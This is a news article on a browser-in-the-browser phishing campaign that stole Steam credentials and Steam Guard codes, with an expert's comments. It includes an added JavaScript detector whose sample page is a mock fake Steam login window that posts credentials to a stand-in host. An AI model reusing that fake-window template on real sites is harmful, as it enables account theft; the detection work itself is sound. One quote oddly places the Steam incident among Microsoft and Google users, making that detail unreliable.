
PC platform caught out in browser-in-the-browser phishing attack

Not so much ‘full steam ahead’: users of the PC gaming platform Steam have been caught out in a phishing attack.

Photo by Joshua Woroniecki, Unsplash (https://unsplash.com/s/photos/laptop?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)

Steam users have been targeted in a browser-in-the-browser (BitB) phishing campaign that gave threat actors access to victims’ accounts and credentials. Steam itself was not breached: the technique draws a fake browser pop-up, complete with an address bar showing a legitimate Steam domain, inside the attacker’s own web page, so the spoofed login window never actually leaves the phishing site.

The technique exploits users’ familiarity with the Single Sign-On model: because legitimate sites routinely open a small pop-up for a third-party login, a counterfeit window drawn in the page looks routine, and the user hands over sensitive information, chiefly their login credentials, to the attacker.

In the Steam campaign, analysts at Group-IB found that attackers lured victims by asking them to log into Steam to “join a team for a LoL, CS, Dota 2, or PUBG tournament, to vote for [their] favorite team, to buy discounted tickets to cybersport events, and more”.

Once the Steam credentials are entered, the fake window goes on to request a Steam Guard authentication code. With both the password and the code in hand, the attackers log into the victim’s Steam account and take control of it.
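The defining feature of the attack described above is that the “address bar” showing a Steam URL is ordinary page content, while the password and Steam Guard fields post to the attacker. As an added example (not code from the article, Group-IB, Seraphic or Steam), the following Node.js script checks a page’s HTML for exactly that pattern. The two sample pages, the hostname cs-tournament.example and the list of trusted Steam login hosts are constructed for the demonstration; a production scanner would inspect the live DOM rather than use regular expressions.

```javascript
// Heuristic detector for browser-in-the-browser (BitB) phishing pages.
// Added example for this article; not code from Group-IB, Seraphic or Steam.
// Assumption: a BitB page draws a fake pop-up whose "address bar" is plain
// page text showing a trusted login URL, while the real <form> posts the
// credentials to some other host. HTML is parsed with regular expressions,
// which is enough for the constructed samples below.

const TRUSTED_LOGIN_HOSTS = new Set([
  "steamcommunity.com",
  "store.steampowered.com",
  "login.steampowered.com",
]);

// Hostname of a URL (resolved against base, if given), or null if it does not parse.
function hostOf(url, base) {
  try {
    return new URL(url, base).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// URLs that appear as visible text (between a '>' and the next '<'), i.e.
// painted onto the page instead of shown in the browser's real address bar.
function renderedUrls(html) {
  const out = [];
  const re = />[^<]*?(https?:\/\/[^\s<"']+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Destination host of every <form> that contains a password field.
// A relative action resolves to the page's own host.
function credentialFormTargets(html, pageUrl) {
  const targets = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    if (!/type\s*=\s*["']?password/i.test(body)) continue;
    const action = (attrs.match(/\baction\s*=\s*["']([^"']*)["']/i) || [])[1] || "";
    targets.push(hostOf(action, pageUrl));
  }
  return targets;
}

// Verdict for one page. pageUrl is what the browser's real address bar shows.
function detectBitB(html, pageUrl) {
  const pageHost = hostOf(pageUrl);
  const spoofedUrls = renderedUrls(html).filter((u) => TRUSTED_LOGIN_HOSTS.has(hostOf(u)));
  const credentialTargets = credentialFormTargets(html, pageUrl);
  const offTrust = credentialTargets.filter((h) => h !== null && !TRUSTED_LOGIN_HOSTS.has(h));
  // Suspicious: an untrusted page paints a trusted login URL as content AND
  // collects a password that goes to an untrusted host.
  const suspicious = !TRUSTED_LOGIN_HOSTS.has(pageHost) && spoofedUrls.length > 0 && offTrust.length > 0;
  return { suspicious, pageHost, spoofedUrls, credentialTargets };
}

// Constructed sample: a tournament lure that draws a fake Steam login window.
const BITB_PAGE = `
<h1>Vote for your favourite CS team</h1>
<div class="fake-window">
  <div class="fake-chrome">&#128274; https://steamcommunity.com/openid/login</div>
  <form method="post" action="https://cs-tournament.example/collect">
    <input name="username">
    <input type="password" name="password">
    <input name="steamguard" placeholder="Steam Guard code">
    <button>Sign in</button>
  </form>
</div>`;

// Constructed sample: a genuine login page as seen by the same check.
const LEGIT_PAGE = `
<form method="post" action="/login/dologin">
  <input name="username">
  <input type="password" name="password">
</form>`;

console.log(detectBitB(BITB_PAGE, "https://cs-tournament.example/vote"));   // suspicious: true
console.log(detectBitB(LEGIT_PAGE, "https://steamcommunity.com/login/home")); // suspicious: false
```

Run it with node; the lure page is flagged because cs-tournament.example paints https://steamcommunity.com/openid/login as text while its password form posts back to cs-tournament.example, and the genuine page is not, because its relative form action resolves to the trusted host. A page that merely links to a Steam URL without a password form is also left alone.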

Looking into the matter for Digital Journal is Alon Levin, VP of Product Management at Seraphic Security.

Levin begins by considering the nature of the attack, noting: “Unfortunately, this approach is rising in popularity among threat actors looking to create fake login forms and sell access to accounts.”

The attack method draws a fake browser window, with its own title bar and address bar, inside the active page, so that it passes for the sign-in pop-up of the targeted login service. Because that window is only HTML and CSS, it cannot be dragged past the edge of the real browser window, a quick check that exposes the fake.

With the specific incident, Levin continues: “In this case, displaying fake browser windows and login forms has allowed this attack method to access the accounts and credentials of Microsoft and Google users.”

When the user proceeds to log in, Levin explains: “Visitors are requested to log in and are then redirected to a fake window, where credentials are stolen after being entered by the user.”

Moving on to consider the attack method more fully, Levin finds: “Although Browser-in-the-Browser attacks are becoming a more common tactic with cybercriminals, Internet users can mitigate these threats by leveraging comprehensive browser security.”

So how might such attacks be thwarted? Levin explains: “Though users can easily mistake such sites as the one targeted in this phishing attempt for being legitimate, a system that is based on execution flow analysis can thwart these attacks easily.”

Levin adds: “Systems based on execution flow analysis can thwart these attacks, maintain session integrity and prevent other types of phishing and social engineering attacks.”

Written By

Dr. Tim Sandle is Digital Journal's Editor-at-Large for science news. Tim specializes in science, technology, environmental, business, and health journalism. He is additionally a practising microbiologist; and an author. He is also interested in history, politics and current affairs.
